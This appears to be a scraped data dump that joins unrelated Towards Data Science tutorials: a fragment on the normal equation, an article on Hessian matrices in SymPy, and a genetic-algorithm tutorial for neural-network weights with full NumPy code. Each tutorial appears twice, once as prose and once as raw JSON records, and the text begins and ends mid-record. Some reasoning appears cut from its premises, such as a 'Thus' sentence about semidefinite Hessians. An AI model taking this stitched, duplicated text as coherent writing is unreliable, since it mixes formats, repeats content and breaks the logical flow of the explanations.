}, { "code": null, "e": 2533, "s": 2505, "text": "3. Implementation in Python" }, { "code": null, "e": 2681, "s": 2533, "text": "The same calculations can be implemented in Python using Numpy library which contains a set of linear algebra functions in numpy.linalg collection." }, { "code": null, "e": 2861, "s": 2681, "text": "import numpy as npX = np.c_[[1,1,1],[1,2,3]] # defining featuresy = np.c_[[1,3,2]] # defining labelstheta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y) # normal equationprint(theta)" }, { "code": null, "e": 2929, "s": 2861, "text": "Now we can define new features we would like to predict values for." }, { "code": null, "e": 2985, "s": 2929, "text": "X_new = np.c_[[1,1,1,1],[0, 0.5,1.5,4]] # new features" }, { "code": null, "e": 3044, "s": 2985, "text": "By implementing equation 2 we obtain the predicted values." }, { "code": null, "e": 3105, "s": 3044, "text": "y_pred = X_new.dot(theta) # making predictionsprint(y_pred)" }, { "code": null, "e": 3117, "s": 3105, "text": "4. Comments" }, { "code": null, "e": 3263, "s": 3117, "text": "As you see it‘s pretty easy to use the normal equation and to implement it in Python — it’s only one line of code. So why it’s not commonly used?" }, { "code": null, "e": 3804, "s": 3263, "text": "The problem is in its numerical complexity. Solving this equation requires inverting a matrix and this is a computationally expensive operation — depending on the implementation, in a big O notation it is O(n3) or slightly less. This means is scales up horribly, practically meaning that when you double number of features, the computational times increases by 23 = 8 times. There is also some chance that the result of step 2 is not invertible at all — causing big troubles. These are the reasons why in practice this approach is uncommon." } ]
Hessian Matrix and Optimization Problems in Python 3.8 | by Louis Brulé Naudet | Towards Data Science
Recommendations

Compatibility test performed with Python 3.8, executed on macOS 11.3 and Linux Ubuntu Server 20.04 LTS environments. Libraries used: NumPy, SymPy.

pip3.8 install numpy sympy

Hessian matrices are used in large-scale optimization problems within Newton-type methods because they are the coefficient of the quadratic term of a local Taylor expansion of a function. Partial derivatives play a prominent role in economics, in which most functions describing economic behaviour posit that the behaviour depends on more than one variable. For example, a societal consumption function may describe the amount spent on consumer goods as depending on both income and wealth; the marginal propensity to consume is then the partial derivative of the consumption function with respect to income.

The Hessian matrix is also commonly used for expressing image processing operators in image processing and computer vision (see the Laplacian of Gaussian (LoG) blob detector). It can also be used in normal mode analysis to calculate the different molecular frequencies in infrared spectroscopy.

The Hessian matrix of a numerical function is the square matrix, noted H(f), of its second partial derivatives. In mathematics, a partial derivative of a function of several variables is its derivative with respect to one of those variables, with the others held constant.

The gradient vector can be interpreted as the "direction and rate of fastest increase". If the gradient of a function is non-zero at a point p, the direction of the gradient is the direction in which the function increases most quickly from p, and the magnitude of the gradient is the rate of increase in that direction, the greatest absolute directional derivative.

In an ordered set E, an element of a part A is the largest element or maximum of A if it belongs to A and is greater than any other element of A. The existence of a maximum is in general not guaranteed for any part of an ordered set. On the other hand, under the existence condition, such an element is unique. Similarly, the smallest element or minimum is, if it exists, an element of A smaller than any other element of A.

The objective is to determine the maximum or minimum candidate by solving the equation grad f(x, y) = 0, i.e. by setting the gradient to zero. Implementation in Python 3.8 is pretty simple and relies on the solve function from the SymPy library. Next, the second derivatives are computed to obtain the Hessian matrix, and a main function of the program arbitrates the assignment of variables between all blocks of instructions.

In our program, we apply Schwarz's theorem on the second partial derivatives of a function of several variables, so that the mixed second partial derivatives are equal. However, we will not prove this theorem, nor will we try to explain it in this article.

Here is an example of a Hessian matrix in numpy.matrix format for the function x**2 - 1.5*x*y + y**2:

Hessian matrix that organizes all the second partial derivatives of the function x**2 - 1.5*x*y + y**2 is :
[[2 -1.50000000000000]
 [-1.50000000000000 2]]
Determinant in the critical point {x: 0.0, y: 0.0} is : 1.75000000000000

The determinant is a scalar value that is a function of the entries of a square matrix. It allows characterizing some properties of the matrix and the linear map represented by the matrix. In particular, the determinant is nonzero if and only if the matrix is invertible, and the linear map represented by the matrix is an isomorphism.
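The code listings embedded in the original post are not reproduced above. As an illustrative stand-in (not the author's exact program; the variable names are my own), the gradient, the critical points, the Hessian and its determinant for f(x, y) = x**2 - 1.5*x*y + y**2 can be obtained with SymPy roughly as follows, which reproduces the matrix and the determinant quoted above:

import sympy as sp

x, y = sp.symbols("x y")
f = x**2 - 1.5*x*y + y**2

# First partial derivatives (the gradient)
gradient = [sp.diff(f, var) for var in (x, y)]

# Critical point candidates: solve grad(f) = 0
critical_points = sp.solve(gradient, [x, y], dict=True)   # [{x: 0.0, y: 0.0}]

# Square matrix of all second partial derivatives
H = sp.hessian(f, (x, y))                                  # Matrix([[2, -1.5], [-1.5, 2]])

# Second-derivative test at each critical point
for point in critical_points:
    H_at_point = H.subs(point)
    print("Hessian:", H_at_point)
    print("Determinant:", H_at_point.det())                # 2*2 - 1.5*1.5 = 1.75

A determinant of 1.75 with a positive second derivative in x is exactly the situation interpreted below.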
Thus, for positive-semidefinite and negative-semidefinite Hessians the test is inconclusive (a critical point where the Hessian is semidefinite but not definite may be a local extremum or a saddle point). In our example, for the critical point (0, 0), the determinant is 1.75 > 0 and f_xx = 2 > 0, so the critical point is a local minimum and the function is strictly convex.

TensorFlow and other machine learning libraries are certainly powerful, but they are still resource-intensive and can be an obstacle on low-performance machines. This article was intended to show a lighter way to build Hessian matrices, using a small tool for scientific computing: SymPy.

Louis Brulé Naudet holds a double degree in Law and Economics/Management from the University of Paris-Saclay.
[ { "code": null, "e": 187, "s": 171, "text": "Recommendations" }, { "code": null, "e": 304, "s": 187, "text": "Compatibility test performed with Python 3.8, executed on MacOS 11.3 and Linux Ubuntu Server 20.04 LTS environments." }, { "code": null, "e": 335, "s": 304, "text": "Libraries Used : Numpy, Sympy." }, { "code": null, "e": 362, "s": 335, "text": "pip3.8 install numpy sympy" }, { "code": null, "e": 971, "s": 362, "text": "Hessian matrices are used in large-scale optimization problems within Newton-type methods because they are the coefficient of the quadratic term of a local Taylor expansion of a function. Partial derivatives play a prominent role in economics, in which most functions describing economic behaviour posit that the behaviour depends on more than one variable. For example, a societal consumption function may describe the amount spent on consumer goods as depending on both income and wealth; the marginal propensity to consume is then the partial derivative of the consumption function with respect to income." }, { "code": null, "e": 1282, "s": 971, "text": "The Hessian matrix is also commonly used for expressing image processing operators in image processing and computer vision (see the Laplacian of Gaussian (LoG) blob detector). The Hessian matrix can also be used in normal mode analysis to calculate the different molecular frequencies in infrared spectroscopy." }, { "code": null, "e": 1555, "s": 1282, "text": "The Hessian matrix of a numerical function is the square matrix, noted H(f), of its second partial derivatives. In mathematics, a partial derivative of a function of several variables is its derivative with respect to one of those variables, with the others held constant." }, { "code": null, "e": 1564, "s": 1555, "text": "Example:" }, { "code": null, "e": 1652, "s": 1564, "text": "The gradient vector can be interpreted as the “direction and rate of fastest increase”." }, { "code": null, "e": 1931, "s": 1652, "text": "If the gradient of a function is non-zero at a point p, the direction of the gradient is the direction in which the function increases most quickly from p, and the magnitude of the gradient is the rate of increase in that direction, the greatest absolute directional derivative." }, { "code": null, "e": 2357, "s": 1931, "text": "In an ordered set E, an element of a part A is the largest element or maximum of A, if it belongs to A and is greater than any other element of A. The existence of a maximum is in general not guaranteed for any part of an ordered set. On the other hand, under the existence condition, such an element is unique. Similarly, the smallest element or minimum is, if it exists, an element of A smaller than any other element of A." }, { "code": null, "e": 2446, "s": 2357, "text": "The objective is to determine the maximum or minimum candidate by solving the equation :" }, { "code": null, "e": 2542, "s": 2446, "text": "Implementation in Python 3.8 is pretty simple, and needs the “solve” function in Sympy library." 
}, { "code": null, "e": 2619, "s": 2542, "text": "Now, we need to perform the second derivative to obtain the hessian matrix :" }, { "code": null, "e": 2755, "s": 2619, "text": "By the way, here is the main function of the program, which arbitrates the assignment of variables between all blocks of instructions :" }, { "code": null, "e": 2879, "s": 2755, "text": "In our program, we apply Schwarz’s theorem on the second partial derivatives of a function of several variables such that :" }, { "code": null, "e": 3047, "s": 2879, "text": "However, we will not prove this theorem, nor will we try to explain it in this article. Here is an example of hessian matrix in numpy.matrix format, for the function :" }, { "code": null, "e": 3270, "s": 3047, "text": "Hessian matrix that organizes all the second partial derivatives of the function x**2–1.5*x*y + y**2 is : [[2 -1.50000000000000][-1.50000000000000 2]]Determinant in the critical point {x: 0.0, y: 0.0} is : 1.75000000000000" }, { "code": null, "e": 3358, "s": 3270, "text": "The determinant is a scalar value that is a function of the entries of a square matrix." }, { "code": null, "e": 3606, "s": 3358, "text": "It allows characterizing some properties of the matrix and the linear map represented by the matrix. In particular, the determinant is nonzero if and only if the matrix is invertible, and the linear map represented by the matrix is an isomorphism." }, { "code": null, "e": 3811, "s": 3606, "text": "Thus, for positive-semidefinite and negative-semidefinite Hessians the test is inconclusive (a critical point where the Hessian is semidefinite but not definite may be a local extremum or a saddle point)." }, { "code": null, "e": 3981, "s": 3811, "text": "In our example, for the critical point (0; 0), the determinant is 1.75 > 0 and f’xx > 0, then, the critical point is a local minimum, so the function is strictly convex." }, { "code": null, "e": 4284, "s": 3981, "text": "Tensorflow or other machine learning libraries are certainly powerful, but they are still excessively resource-intensive and can be an obstacle for low-performance machines, this article was intended to interpret a new way to build Hessian matrices, with a lighter tool for scientific computing: sympy." } ]
Artificial Neural Networks Optimization using Genetic Algorithm with Python | by Ahmed Gad | Towards Data Science
In a previous tutorial titled "Artificial Neural Network Implementation using NumPy and Classification of the Fruits360 Image Dataset", available in my LinkedIn profile at this link, an artificial neural network (ANN) is created for classifying 4 classes of the Fruits360 image dataset. The source code used in this tutorial is available in my GitHub page.

This tutorial is also available at TowardsDataScience here.

A quick summary of that tutorial: the feature vector (a 360-bin hue channel histogram) is extracted and reduced to just 102 elements using a filter-based technique based on the standard deviation. Later, the ANN is built from scratch using NumPy.

The ANN was not completely created: only the forward pass was implemented, and there is no backward pass for updating the network weights. This is why the accuracy is very low and does not exceed 45%. The solution to this problem is to use an optimization technique for updating the network weights. This tutorial uses the genetic algorithm (GA) for optimizing the network weights.

It is worth mentioning that both the previous and this tutorial are based on my 2018 book cited as "Ahmed Fawzy Gad 'Practical Computer Vision Applications Using Deep Learning with CNNs'. Dec. 2018, Apress, 978-1-4842-4167-7". The book is available at Springer at this link. You can find all details within this book.

The source code used in this tutorial is available in my GitHub page here.

Before starting this tutorial, I recommend reading about how the genetic algorithm works and its implementation in Python using NumPy from scratch, based on my previous tutorials found at the links listed in the Resources section at the end of the tutorial.

After understanding how GA works based on numerical examples in addition to implementation using Python, we can start using GA to optimize the ANN by updating its weights (parameters).

GA creates multiple solutions to a given problem and evolves them through a number of generations. Each solution holds all parameters that might help to enhance the results. For an ANN, weights in all layers help achieve high accuracy. Thus, a single solution in GA will contain all weights in the ANN. According to the network structure discussed in the previous tutorial and given in the figure below, the ANN has 4 layers (1 input, 2 hidden, and 1 output). Any weight in any layer will be part of the same solution. A single solution to such a network will contain a total number of weights equal to 102x150+150x60+60x4=24,540. If the population has 8 solutions with 24,540 parameters per solution, then the total number of parameters in the entire population is 24,540x8=196,320.

Looking at the above figure, the parameters of the network are in matrix form because this makes the ANN calculations much easier. For each layer, there is an associated weights matrix. Just multiply the inputs matrix by the parameters matrix of a given layer to return the outputs of that layer. Chromosomes in GA are 1D vectors, and thus we have to convert the weights matrices into 1D vectors.

Because matrix multiplication is a good option to work with the ANN, we will still represent the ANN parameters in matrix form when using the ANN. Thus, matrix form is used when working with the ANN and vector form is used when working with GA. This means we need to convert the matrix to a vector and vice versa. The next figure summarizes the steps of using GA with ANN. This figure is referred to as the main figure.

Each solution in the population will have two representations.
First is a 1D vector for working with GA, and the second is a matrix to work with the ANN. Because there are 3 weights matrices for the 3 layers (2 hidden + 1 output), there will be 3 vectors, one for each matrix. Because a solution in GA is represented as a single 1D vector, these 3 individual 1D vectors will be concatenated into a single 1D vector. Each solution will therefore be represented as a vector of length 24,540. The next Python code creates a function named mat_to_vector() that converts the parameters of all solutions within the population from matrix to vector.

def mat_to_vector(mat_pop_weights):
    pop_weights_vector = []
    for sol_idx in range(mat_pop_weights.shape[0]):
        curr_vector = []
        for layer_idx in range(mat_pop_weights.shape[1]):
            vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size))
            curr_vector.extend(vector_weights)
        pop_weights_vector.append(curr_vector)
    return numpy.array(pop_weights_vector)

The function accepts an argument representing the population of all solutions in order to loop through them and return their vector representation. At the beginning of the function, an empty list variable named pop_weights_vector is created to hold the result (vectors of all solutions). For each solution in matrix form, there is an inner loop that loops through its three matrices. Each matrix is converted into a vector using the numpy.reshape() function, which accepts the input matrix and the output size to which the matrix will be reshaped. The variable curr_vector collects all vectors for a single solution. After all vectors are generated, they get appended into the pop_weights_vector variable.

Note that the extend() list method is used for vectors belonging to the same solution and the append() list method for vectors belonging to different solutions. The reason is that extend() takes the numbers within the 3 vectors belonging to the same solution and concatenates them together; calling it for two lists yields a single flat list with the numbers from both. This is suitable for creating just one 1D chromosome per solution. append(), by contrast, adds a whole list as a single nested element, so calling it for two lists produces a list containing two sub-lists. That is not what we want within one solution, but it is exactly what we want for keeping different solutions separate. Finally, the function mat_to_vector() returns the population solutions as a NumPy array for easy manipulation later.

After converting all solutions from matrices to vectors and concatenating them together, we are ready to go through the GA steps discussed in the tutorial titled "Introduction to Optimization with Genetic Algorithm". The steps are presented in the main figure and also summarized in the next figure.

Remember that GA uses a fitness function to return a fitness value for each solution. The higher the fitness value, the better the solution. The best solutions are returned as parents in the parents selection step.

One of the common fitness functions for a classifier such as an ANN is the accuracy. It is the ratio between the correctly classified samples and the total number of samples, multiplied by 100 to express it as a percentage. The classification accuracy of each solution is calculated according to the steps in the main figure.

The single 1D vector of each solution is converted back into 3 matrices, one matrix for each layer (2 hidden and 1 output). Conversion takes place using a function called vector_to_mat(). It is defined in the next code.
def vector_to_mat(vector_pop_weights, mat_pop_weights):
    mat_weights = []
    for sol_idx in range(mat_pop_weights.shape[0]):
        start = 0
        end = 0
        for layer_idx in range(mat_pop_weights.shape[1]):
            end = end + mat_pop_weights[sol_idx, layer_idx].size
            curr_vector = vector_pop_weights[sol_idx, start:end]
            mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape))
            mat_weights.append(mat_layer_weights)
            start = end
    return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)

It reverses the work done previously. But there is an important question: if the vector of a given solution is just one piece, how can we split it into three different parts, each part representing a matrix? The size of the first parameters matrix between the input layer and the hidden layer is 102x150. When converted into a vector, its length is 15,300. Because it is the first vector to be inserted in the curr_vector variable according to the mat_to_vector() function, its indices start at index 0 and end at index 15,299. The mat_pop_weights argument is passed to the vector_to_mat() function in order to know the size of each matrix. We are not interested in using the weight values from the mat_pop_weights variable; only the matrix sizes are taken from it.

The second vector in the same solution is the result of converting a matrix of size 150x60, so its length is 9,000. This vector is inserted into the curr_vector variable just after the previous vector of length 15,300. As a result, it starts at index 15,300 and ends at index 15,300+9,000-1=24,299. The -1 is used because Python starts indexing at 0. The last vector, created from the parameters matrix of size 60x4, has length 240. Because it is added into the curr_vector variable exactly after the previous vector of length 9,000, its index starts after it: its start index is 24,300 and its end index is 24,300+240-1=24,539. So, we can successfully restore the vector into the original 3 matrices.

The matrices returned for each solution are used to predict the class label for each of the 1,962 samples in the used dataset in order to calculate the accuracy. This is done using 2 functions, predict_outputs() and fitness(), shown in the next code.

def predict_outputs(weights_mat, data_inputs, data_outputs, activation="relu"):
    predictions = numpy.zeros(shape=(data_inputs.shape[0]))
    for sample_idx in range(data_inputs.shape[0]):
        r1 = data_inputs[sample_idx, :]
        for curr_weights in weights_mat:
            r1 = numpy.matmul(a=r1, b=curr_weights)
            if activation == "relu":
                r1 = relu(r1)
            elif activation == "sigmoid":
                r1 = sigmoid(r1)
        predicted_label = numpy.where(r1 == numpy.max(r1))[0][0]
        predictions[sample_idx] = predicted_label
    correct_predictions = numpy.where(predictions == data_outputs)[0].size
    accuracy = (correct_predictions/data_outputs.size)*100
    return accuracy, predictions

def fitness(weights_mat, data_inputs, data_outputs, activation="relu"):
    accuracy = numpy.empty(shape=(weights_mat.shape[0]))
    for sol_idx in range(weights_mat.shape[0]):
        curr_sol_mat = weights_mat[sol_idx, :]
        accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation)
    return accuracy

The predict_outputs() function accepts the weights of a single solution, the inputs and outputs of the training data, and an optional parameter that specifies which activation function to use. It returns the accuracy of just one solution, not all solutions within the population.
In order to return the fitness value (i.e. accuracy) of all solutions within the population, the fitness() function loops through each solution, passes it to the predict_outputs() function, stores the accuracy of all solutions into the accuracy array, and finally returns that array.

After calculating the fitness value (i.e. accuracy) for all solutions, the remaining steps of GA in the main figure are applied the same way as done previously. The best parents are selected, based on their accuracy, into the mating pool. Then mutation and crossover variants are applied in order to produce the offspring. The population of the new generation is created from both offspring and parents. These steps are repeated for a number of generations.

The Python implementation for such a project has three Python files:

ga.py for implementing GA functions.

ANN.py for implementing ANN functions.

A third file for calling such functions through a number of generations. This is the main file of the project.

The third file is the main file because it connects all functions. It reads the features and the class labels files, filters features based on the standard deviation, creates the ANN architecture, generates the initial solutions, loops through a number of generations by calculating the fitness values for all solutions, selecting the best parents, applying crossover and mutation, and finally creating the new population. Its implementation is given below. This file defines the GA parameters, such as the number of solutions per population, the number of selected parents, the mutation percent, and the number of generations. You can try different values for them.

import numpy
import ga
import pickle
import ANN
import matplotlib.pyplot

f = open("dataset_features.pkl", "rb")
data_inputs2 = pickle.load(f)
f.close()

features_STDs = numpy.std(a=data_inputs2, axis=0)
data_inputs = data_inputs2[:, features_STDs>50]

f = open("outputs.pkl", "rb")
data_outputs = pickle.load(f)
f.close()

#Genetic algorithm parameters:
# Mating Pool Size (Number of Parents)
# Population Size
# Number of Generations
# Mutation Percent
sol_per_pop = 8
num_parents_mating = 4
num_generations = 1000
mutation_percent = 10

#Creating the initial population.
initial_pop_weights = []
for curr_sol in numpy.arange(0, sol_per_pop):
    HL1_neurons = 150
    input_HL1_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(data_inputs.shape[1], HL1_neurons))
    HL2_neurons = 60
    HL1_HL2_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL1_neurons, HL2_neurons))
    output_neurons = 4
    HL2_output_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL2_neurons, output_neurons))
    initial_pop_weights.append(numpy.array([input_HL1_weights, HL1_HL2_weights, HL2_output_weights]))

pop_weights_mat = numpy.array(initial_pop_weights)
pop_weights_vector = ga.mat_to_vector(pop_weights_mat)

best_outputs = []
accuracies = numpy.empty(shape=(num_generations))

for generation in range(num_generations):
    print("Generation : ", generation)

    # Converting the solutions from vectors to matrices.
    pop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat)

    # Measuring the fitness of each chromosome in the population.
    fitness = ANN.fitness(pop_weights_mat, data_inputs, data_outputs, activation="sigmoid")
    accuracies[generation] = fitness[0]
    print("Fitness")
    print(fitness)

    # Selecting the best parents in the population for mating.
    parents = ga.select_mating_pool(pop_weights_vector, fitness.copy(), num_parents_mating)
    print("Parents")
    print(parents)

    # Generating the next generation using crossover.
    offspring_crossover = ga.crossover(parents, offspring_size=(pop_weights_vector.shape[0]-parents.shape[0], pop_weights_vector.shape[1]))
    print("Crossover")
    print(offspring_crossover)

    # Adding some variations to the offspring using mutation.
    offspring_mutation = ga.mutation(offspring_crossover, mutation_percent=mutation_percent)
    print("Mutation")
    print(offspring_mutation)

    # Creating the new population based on the parents and offspring.
    pop_weights_vector[0:parents.shape[0], :] = parents
    pop_weights_vector[parents.shape[0]:, :] = offspring_mutation

pop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat)
best_weights = pop_weights_mat[0, :]
acc, predictions = ANN.predict_outputs(best_weights, data_inputs, data_outputs, activation="sigmoid")
print("Accuracy of the best solution is : ", acc)

matplotlib.pyplot.plot(accuracies, linewidth=5, color="black")
matplotlib.pyplot.xlabel("Iteration", fontsize=20)
matplotlib.pyplot.ylabel("Fitness", fontsize=20)
matplotlib.pyplot.xticks(numpy.arange(0, num_generations+1, 100), fontsize=15)
matplotlib.pyplot.yticks(numpy.arange(0, 101, 5), fontsize=15)

f = open("weights_"+str(num_generations)+"_iterations_"+str(mutation_percent)+"%_mutation.pkl", "wb")
pickle.dump(pop_weights_mat, f)
f.close()

Based on 1,000 generations, a plot is created at the end of this file using the Matplotlib visualization library, showing how the accuracy changes across the generations. It is shown in the next figure.

After 1,000 iterations, the accuracy is more than 97%. This is compared to 45% without using an optimization technique, as in the previous tutorial. This is evidence that poor results may come not from something wrong in the model or the data, but from the absence of an optimization technique. Of course, using different values for the parameters, such as 10,000 generations, might increase the accuracy further. At the end of this file, the parameters are saved in matrix form to disk for later use.

The ga.py file implementation is listed below. Note that the mutation() function accepts the mutation_percent parameter, which defines the percentage of genes whose values are changed randomly. It is set to 10% in the main file. This file also holds the 2 new functions mat_to_vector() and vector_to_mat().
import numpy
import random

# Converting each solution from matrix to vector.
def mat_to_vector(mat_pop_weights):
    pop_weights_vector = []
    for sol_idx in range(mat_pop_weights.shape[0]):
        curr_vector = []
        for layer_idx in range(mat_pop_weights.shape[1]):
            vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size))
            curr_vector.extend(vector_weights)
        pop_weights_vector.append(curr_vector)
    return numpy.array(pop_weights_vector)

# Converting each solution from vector to matrix.
def vector_to_mat(vector_pop_weights, mat_pop_weights):
    mat_weights = []
    for sol_idx in range(mat_pop_weights.shape[0]):
        start = 0
        end = 0
        for layer_idx in range(mat_pop_weights.shape[1]):
            end = end + mat_pop_weights[sol_idx, layer_idx].size
            curr_vector = vector_pop_weights[sol_idx, start:end]
            mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape))
            mat_weights.append(mat_layer_weights)
            start = end
    return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)

def select_mating_pool(pop, fitness, num_parents):
    # Selecting the best individuals in the current generation as parents for producing the offspring of the next generation.
    parents = numpy.empty((num_parents, pop.shape[1]))
    for parent_num in range(num_parents):
        max_fitness_idx = numpy.where(fitness == numpy.max(fitness))
        max_fitness_idx = max_fitness_idx[0][0]
        parents[parent_num, :] = pop[max_fitness_idx, :]
        fitness[max_fitness_idx] = -99999999999
    return parents

def crossover(parents, offspring_size):
    offspring = numpy.empty(offspring_size)
    # The point at which crossover takes place between two parents. Usually, it is at the center.
    crossover_point = numpy.uint32(offspring_size[1]/2)
    for k in range(offspring_size[0]):
        # Index of the first parent to mate.
        parent1_idx = k%parents.shape[0]
        # Index of the second parent to mate.
        parent2_idx = (k+1)%parents.shape[0]
        # The new offspring will have the first half of its genes taken from the first parent.
        offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point]
        # The new offspring will have the second half of its genes taken from the second parent.
        offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:]
    return offspring

def mutation(offspring_crossover, mutation_percent):
    num_mutations = numpy.uint32((mutation_percent*offspring_crossover.shape[1])/100)
    mutation_indices = numpy.array(random.sample(range(0, offspring_crossover.shape[1]), num_mutations))
    # Mutation randomly changes the selected genes in each offspring.
    for idx in range(offspring_crossover.shape[0]):
        # The random value to be added to the gene.
        random_value = numpy.random.uniform(-1.0, 1.0, 1)
        offspring_crossover[idx, mutation_indices] = offspring_crossover[idx, mutation_indices] + random_value
    return offspring_crossover

Finally, ANN.py is implemented according to the code listed below. It contains the implementation of the activation functions (sigmoid and ReLU) in addition to the fitness() and predict_outputs() functions that calculate the accuracy.
import numpy

def sigmoid(inpt):
    return 1.0 / (1.0 + numpy.exp(-1 * inpt))

def relu(inpt):
    result = inpt
    result[inpt < 0] = 0
    return result

def predict_outputs(weights_mat, data_inputs, data_outputs, activation="relu"):
    predictions = numpy.zeros(shape=(data_inputs.shape[0]))
    for sample_idx in range(data_inputs.shape[0]):
        r1 = data_inputs[sample_idx, :]
        for curr_weights in weights_mat:
            r1 = numpy.matmul(a=r1, b=curr_weights)
            if activation == "relu":
                r1 = relu(r1)
            elif activation == "sigmoid":
                r1 = sigmoid(r1)
        predicted_label = numpy.where(r1 == numpy.max(r1))[0][0]
        predictions[sample_idx] = predicted_label
    correct_predictions = numpy.where(predictions == data_outputs)[0].size
    accuracy = (correct_predictions / data_outputs.size) * 100
    return accuracy, predictions

def fitness(weights_mat, data_inputs, data_outputs, activation="relu"):
    accuracy = numpy.empty(shape=(weights_mat.shape[0]))
    for sol_idx in range(weights_mat.shape[0]):
        curr_sol_mat = weights_mat[sol_idx, :]
        accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation)
    return accuracy

Resources

Introduction to Optimization with Genetic Algorithm

https://www.linkedin.com/pulse/introduction-optimization-genetic-algorithm-ahmed-gad/

https://www.kdnuggets.com/2018/03/introduction-optimization-with-genetic-algorithm.html

https://towardsdatascience.com/introduction-to-optimization-with-genetic-algorithm-2f5001d9964b

https://www.springer.com/us/book/9781484241660

Genetic Algorithm (GA) Optimization — Step-by-Step Example

https://www.slideshare.net/AhmedGadFCIT/genetic-algorithm-ga-optimization-stepbystep-example

Genetic Algorithm Implementation in Python
[ { "code": null, "e": 527, "s": 171, "text": "In a previous tutorial titled “Artificial Neural Network Implementation using NumPy and Classification of the Fruits360 Image Dataset” available in my LinkedIn profile at this link, an artificial neural network (ANN) is created for classifying 4 classes of the Fruits360 image dataset. The source code used in this tutorial is available in my GitHub page." }, { "code": null, "e": 587, "s": 527, "text": "This tutorial is also available at TowardsDataScience here." }, { "code": null, "e": 836, "s": 587, "text": "A quick summary of this tutorial is extracting the feature vector (360 bins hue channel histogram) and reducing it to just 102 element by using a filter-based technique using the standard deviation. Later, the ANN is built from scratch using NumPy." }, { "code": null, "e": 1213, "s": 836, "text": "The ANN was not completely created as just the forward pass was made ready but there is no backward pass for updating the network weights. This is why the accuracy is very low and not exceeds 45%. The solution to this problem is using an optimization technique for updating the network weights. This tutorial uses the genetic algorithm (GA) for optimizing the network weights." }, { "code": null, "e": 1532, "s": 1213, "text": "It is worth-mentioning that both the previous and this tutorial are based on my 2018 book cited as “Ahmed Fawzy Gad ‘Practical Computer Vision Applications Using Deep Learning with CNNs’. Dec. 2018, Apress, 978–1–4842–4167–7 “. The book is available at Springer at this link. You can find all details within this book." }, { "code": null, "e": 1607, "s": 1532, "text": "The source code used in this tutorial is available in my GitHub page here." }, { "code": null, "e": 1866, "s": 1607, "text": "Before starting this tutorial, I recommended reading about how the genetic algorithm works and its implementation in Python using NumPy from scratch based on my previous tutorials found at the links listed in the Resources section at the end of the tutorial." }, { "code": null, "e": 2051, "s": 1866, "text": "After understanding how GA works based on numerical examples in addition to implementation using Python, we can start using GA to optimize the ANN by updating its weights (parameters)." }, { "code": null, "e": 2830, "s": 2051, "text": "GA creates multiple solutions to a given problem and evolves them through a number of generations. Each solution holds all parameters that might help to enhance the results. For ANN, weights in all layers help achieve high accuracy. Thus, a single solution in GA will contain all weights in the ANN. According to the network structure discussed in the previous tutorial and given in the figure below, the ANN has 4 layers (1 input, 2 hidden, and 1 output). Any weight in any layer will be part of the same solution. A single solution to such network will contain a total number of weights equal to 102x150+150x60+60x4=24,540. If the population has 8 solutions with 24,540 parameters per solution, then the total number of parameters in the entire population is 24,540x8=196,320." }, { "code": null, "e": 3225, "s": 2830, "text": "Looking at the above figure, the parameters of the network are in matrix form because this makes calculations of ANN much easier. For each layer, there is an associated weights matrix. Just multiply the inputs matrix by the parameters matrix of a given layer to return the outputs in such layer. 
Chromosomes in GA are 1D vectors and thus we have to convert the weights matrices into 1D vectors." }, { "code": null, "e": 3639, "s": 3225, "text": "Because matrix multiplication is a good option to work with ANN, we will still represent the ANN parameters in the matrix form when using the ANN. Thus, matrix form is used when working with ANN and vector form is used when working with GA. This makes us need to convert the matrix to vector and vice versa. The next figure summarizes the steps of using GA with ANN. This figure is referred to as the main figure." }, { "code": null, "e": 4262, "s": 3639, "text": "Each solution in the population will have two representations. First is a 1D vector for working with GA and second is a matrix to work with ANN. Because there are 3 weights matrices for the 3 layers (2 hidden + 1 output), there will be 3 vectors, one for each matrix. Because a solution in GA is represented as a single 1D vector, such 3 individual 1D vectors will be concatenated into a single 1D vector. Each solution will be represented as a vector of length 24,540. The next Python code creates a function named mat_to_vector() that converts the parameters of all solutions within the population from matrix to vector." }, { "code": null, "e": 4731, "s": 4262, "text": "def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector)" }, { "code": null, "e": 5443, "s": 4731, "text": "The function accepts an argument representing the population of all solutions in order to loop through them and return their vector representation. At the beginning of the function, an empty list variable named pop_weights_vector is created to hold the result (vectors of all solutions). For each solution in matrix form, there is an inner loop that loops through its three matrices. For each matrix, it is converted into a vector using the numpy.reshape() function which accepts the input matrix and the output size to which the matrix will be reshaped. The variable curr_vector accepts all vectors for a single solution. After all vectors are generated, they get appended into the pop_weights_vector variable." }, { "code": null, "e": 6205, "s": 5443, "text": "Note that we used the numpy.extend() function for vectors belonging to the same solution and numpy.append() for vectors belonging to different solutions. The reason is that numpy.extend() takes the numbers within the 3 vectors belonging to the same solution and concatenate them together. In other words, calling this function for two lists returns a new single list with numbers from both lists. This is suitable in order to create just a 1D chromosome for each solution. But numpy.append() will return three lists for each solution. Calling it for two lists, it returns a new list which is split into two sub-lists. This is not our objective. Finally, the function mat_to_vector() returns the population solutions as a NumPy array for easy manipulation later." }, { "code": null, "e": 6499, "s": 6205, "text": "After converting all solutions from matrices to vectors and concatenated 